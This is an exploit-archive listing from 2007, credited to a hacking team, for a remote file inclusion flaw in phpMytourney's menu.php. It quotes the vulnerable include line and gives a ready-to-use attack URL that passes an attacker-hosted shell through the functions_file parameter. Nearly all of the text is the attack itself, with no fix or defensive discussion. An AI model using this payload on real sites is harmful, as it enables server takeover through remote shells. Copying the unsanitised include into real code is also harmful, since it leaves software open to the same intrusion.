phpMytourney (menu.php) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpMytourney (menu.php) Remote File Inclusion Vulnerability
# Published : 2007-09-06
# Author : S.W.A.T.
# Previous Title : Online Fantasy Football League (OFFL) 0.2.6 RFI Vulnerabilities
# Next Title : AnyInventory <= 2.0 (environment.php) Remote File Inclusion Vuln

*******************************************************************************
# Title   :  phpMytourney (functions_file) Remote File Inclusion Vulnerability
# Author  :  S.W.A.T.
# Contact :  S.W.4.T@HackerMail.com
# S.Page  :  http://script.vanta.ru/download.php?id=1178&clas=0
# $$      :  Free
# Site    :  Http://www.XmorS-Security.CoM - Http://www.xmors.com - Http://www.xmors.net
*******************************************************************************
Vuln Code:

include($functions_file);

[[Remote]]]

http://[target]/[path]/menu.php?functions_file=[SHELL]

"""""""""""""""""""""

# I Love XmorsTEAM
# We Are: Scorpiunix - KAMY4r - D3vil_boy_ir - Sh3llH3ll - The_Edit0r - S.W.A.T.
# Iranian Hackers & Security TEAM
# Xmors Digital Network Hacking & Security Team

# www.Syue.com [2007-09-06]